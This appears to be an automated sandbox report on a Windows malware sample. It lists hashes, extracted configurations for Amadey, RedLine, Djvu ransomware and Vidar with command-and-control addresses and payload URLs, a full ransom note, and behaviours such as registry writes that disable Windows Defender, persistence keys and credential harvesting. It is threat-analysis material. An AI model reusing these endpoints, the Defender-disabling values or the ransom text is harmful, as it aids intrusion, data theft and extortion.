Analysis

max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-01-2023 15:21
Behavioral task: behavioral1
Sample: f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Resource: win7-20221111-en

Behavioral task: behavioral2
Sample: f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Resource: win10v2004-20220812-en
General

Target: f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Size: 235KB
MD5: 67bb41448f41511e169c83230d7e9486
SHA1: dde5a6577a966a9e8713e66ad7ef50b840dd114e
SHA256: f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914da4e04aee13df10007b
SHA512: 84baf5659cee4e55f48ea0523e2f30c5c6d696d5881da7f628cb4450f1dfc949396ee48cbded60dc98b53483aeb5cdf7fbe4970ab612049356185f2aadf02d84
SSDEEP: 6144:ILUoeyDABOdDubDXqgraG0JzSRuVyL+VY9QqgE:Ilu0LgwJ4uVyaVgJ
Malware Config

Extracted: amadey
3.66
62.204.41.72/hn85jlUn/index.php
62.204.41.88/9vdVVVjsw/index.php

Extracted: redline
druid
62.204.41.170:4132
auth_value: fddcb4126f1d0ea4ac975511b3530e72

Extracted: redline
new1
176.113.115.16:4122
auth_value: ac44cbde6633acc9d67419c7278d5c70

Extracted: redline
temp45645645
82.115.223.9:15486
auth_value: f7fe7a35c673cce3fa35569cf455f570

Extracted: amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php

Extracted: djvu
http://drampik.com/raud/get.php
extension: .assm
offline_id: ex4uvTKsM2vEkIcr3MjXi2C6v27h1mS682iUXGt1
payload_url:
http://uaery.top/dl/build2.exe
http://drampik.com/files/1/build3.exe
ransomnote:
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-wY6g3rkhZz Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0638JOsie

Extracted: vidar
2.3
19
https://t.me/mantarlars
https://steamcommunity.com/profiles/76561199474840123
profile_id: 19
Signatures

Detect rhadamanthys stealer shellcode (5 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/3952-237-0x0000000000580000-0x000000000059D000-memory.dmp | family_rhadamanthys
behavioral2/memory/4528-278-0x0000000000F10000-0x0000000000F2D000-memory.dmp | family_rhadamanthys
behavioral2/memory/3952-287-0x0000000000580000-0x000000000059D000-memory.dmp | family_rhadamanthys
behavioral2/memory/4844-295-0x0000000000690000-0x00000000006AD000-memory.dmp | family_rhadamanthys
behavioral2/memory/4844-332-0x0000000000690000-0x00000000006AD000-memory.dmp | family_rhadamanthys
Detected Djvu ransomware (7 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/1020-313-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral2/memory/1020-315-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral2/memory/1020-318-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral2/memory/4408-319-0x0000000002240000-0x000000000235B000-memory.dmp | family_djvu
behavioral2/memory/1020-323-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral2/memory/604-382-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
behavioral2/memory/604-384-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
Djvu Ransomware
Ransomware which is a variant of the STOP family.

Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | moda1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | moda1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | trena1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | trena1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | trena1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | moda1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | moda1.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | trena1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | trena1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | moda1.exe
Modifies security service (2 TTPs, 5 IoCs)
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1340 | 4572 | rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess (14 IoCs)
Processes:
description | pid | process | target process
PID 2332 created 2672 | 2332 | OwvtknErB0Wl.exe | taskhostw.exe
PID 4204 created 376 | 4204 | XandETC.exe | Explorer.EXE
PID 4204 created 376 | 4204 | XandETC.exe | Explorer.EXE
PID 4204 created 376 | 4204 | XandETC.exe | Explorer.EXE
PID 4204 created 376 | 4204 | XandETC.exe | Explorer.EXE
PID 4204 created 376 | 4204 | XandETC.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
PID 2340 created 376 | 2340 | conhost.exe | Explorer.EXE
PID 1680 created 376 | 1680 | updater.exe | Explorer.EXE
Blocklisted process makes network request (5 IoCs)
Processes:
flow | pid | process
86 | 2948 | rundll32.exe
150 | 2708 | powershell.exe
177 | 1620 | rundll32.exe
187 | 2708 | powershell.exe
202 | 2708 | powershell.exe

Downloads MZ/PE file
Executes dropped EXE (41 IoCs)
Processes:
pid | process
628 | nbveek.exe
4320 | moda.exe
3348 | trena1.exe
4124 | druid1.exe
3200 | nitka.exe
260 | moda1.exe
3232 | druid.exe
4976 | nitka1.exe
3168 | lebro.exe
3376 | nbveek.exe
2908 | fular.exe
2332 | OwvtknErB0Wl.exe
432 | fular1.exe
4740 | vina.exe
2720 | Player3.exe
3328 | nbveek.exe
3952 | vina1.exe
4844 | cc.exe
1620 | uplagin.exe
4408 | raud-290123del700_2023-01-29_12-52.exe
3120 | pb1111.exe
2588 | jn-17L.exe
1056 | LummaC2.exe
2376 | video.exe
3456 | random.exe
4128 | random.exe
4204 | XandETC.exe
4428 | Engine.exe
1020 | raud-290123del700_2023-01-29_12-52.exe
2656 | ChromeSetup.exe
3348 | raud-290123del700_2023-01-29_12-52.exe
1444 | Russian.exe.pif
604 | raud-290123del700_2023-01-29_12-52.exe
3832 | nbveek.exe
4304 | build2.exe
1336 | build3.exe
2220 | build2.exe
2656 | 9308.exe
1680 | updater.exe
3708 | nbveek.exe
4912 | mstsca.exe
Stops running service(s) (3 TTPs)

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe | upx
C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe | upx
behavioral2/memory/4428-299-0x0000000000400000-0x0000000000558000-memory.dmp | upx

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe | vmprotect
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe | vmprotect
behavioral2/memory/3120-257-0x0000000140000000-0x000000014061A000-memory.dmp | vmprotect
Checks computer location settings (2 TTPs, 12 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | lebro.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | random.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | jn-17L.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | raud-290123del700_2023-01-29_12-52.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | nbveek.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | Russian.exe.pif
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | raud-290123del700_2023-01-29_12-52.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | Player3.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | video.exe
Drops startup file (1 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zge41g4apb0.lnk | powershell.exe
Loads dropped DLL (14 IoCs)
Processes:
pid | process
2332 | OwvtknErB0Wl.exe
2948 | rundll32.exe
4784 | svchost.exe
2376 | video.exe
2376 | video.exe
5000 | rundll32.exe
3516 | rundll32.exe
3512 | rundll32.exe
2180 | rundll32.exe
920 | rundll32.exe
4280 | rundll32.exe
1620 | rundll32.exe
1444 | Russian.exe.pif
1444 | Russian.exe.pif
Modifies file permissions (1 TTPs, 1 IoCs)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | moda1.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | moda.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | trena1.exe
Accesses Microsoft Outlook profiles (1 TTPs, 6 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook | rundll32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook | rundll32.exe
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 4 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\druid.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000006051\\druid.exe" | nbveek.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a7e592f1-b46b-45d4-965a-f2891e354357\\raud-290123del700_2023-01-29_12-52.exe\" --AutoStart" | raud-290123del700_2023-01-29_12-52.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\druid1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000003051\\druid1.exe" | nbveek.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nitka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000004051\\nitka.exe" | nbveek.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops desktop.ini file(s) (1 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | svchost.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
124 | api.2ip.ua
52 | api.ipify.org
81 | api.2ip.ua
82 | api.2ip.ua
Drops file in System32 directory (3 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
Processes:
pid | process
3952 | vina1.exe
3952 | vina1.exe
3952 | vina1.exe
Suspicious use of SetThreadContext (7 IoCs)
Processes:
description | pid | process | target process
PID 2332 set thread context of 1268 | 2332 | OwvtknErB0Wl.exe | ngentask.exe
PID 4408 set thread context of 1020 | 4408 | raud-290123del700_2023-01-29_12-52.exe | raud-290123del700_2023-01-29_12-52.exe
PID 3348 set thread context of 604 | 3348 | raud-290123del700_2023-01-29_12-52.exe | raud-290123del700_2023-01-29_12-52.exe
PID 4304 set thread context of 2220 | 4304 | build2.exe | build2.exe
PID 1620 set thread context of 3948 | 1620 | rundll32.exe | rundll32.exe
PID 1680 set thread context of 2340 | 1680 | updater.exe | conhost.exe
PID 1680 set thread context of 3724 | 1680 | updater.exe | conhost.exe
Drops file in Program Files directory (4 IoCs)
Processes:
description | ioc | process
File created | C:\Program Files\Notepad\Chrome\updater.exe | XandETC.exe
File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
File created | C:\Program Files\Google\Libs\g.log | cmd.exe
Launches sc.exe (10 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
3400 | sc.exe
3456 | sc.exe
1776 | sc.exe
1008 | sc.exe
1124 | sc.exe
4124 | sc.exe
4828 | sc.exe
4584 | sc.exe
4780 | sc.exe
4024 | sc.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (13 IoCs)
Processes:
pid | pid_target | process | target process
4320 | 2332 | WerFault.exe | OwvtknErB0Wl.exe
3656 | 2332 | WerFault.exe | OwvtknErB0Wl.exe
2896 | 3200 | WerFault.exe | nitka.exe
5088 | 4844 | WerFault.exe | cc.exe
2492 | 4784 | WerFault.exe | rundll32.exe
1684 | 4976 | WerFault.exe | nitka1.exe
4740 | 432 | WerFault.exe | fular1.exe
2340 | 2948 | WerFault.exe | rundll32.exe
1792 | 2376 | WerFault.exe | video.exe
5112 | 2220 | WerFault.exe | build2.exe
1344 | 3512 | WerFault.exe | rundll32.exe
3948 | 4280 | WerFault.exe | rundll32.exe
3048 | 2656 | WerFault.exe | 9308.exe
Checks SCSI registry key(s) (3 TTPs, 8 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | vina1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ChromeSetup.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vina1.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | vina1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | vina1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | vina1.exe
Checks processor information in registry (2 TTPs, 30 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Russian.exe.pif
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | rundll32.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | svchost.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | video.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | video.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Russian.exe.pif
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | svchost.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | svchost.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | rundll32.exe
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | rundll32.exe
Creates scheduled task(s) (1 TTPs, 5 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4964 | schtasks.exe
3264 | schtasks.exe
1976 | schtasks.exe
4392 | schtasks.exe
3092 | schtasks.exe

Delays execution with timeout.exe (2 IoCs)
Processes:
pid | process
3168 | timeout.exe
3152 | timeout.exe
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS (64 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
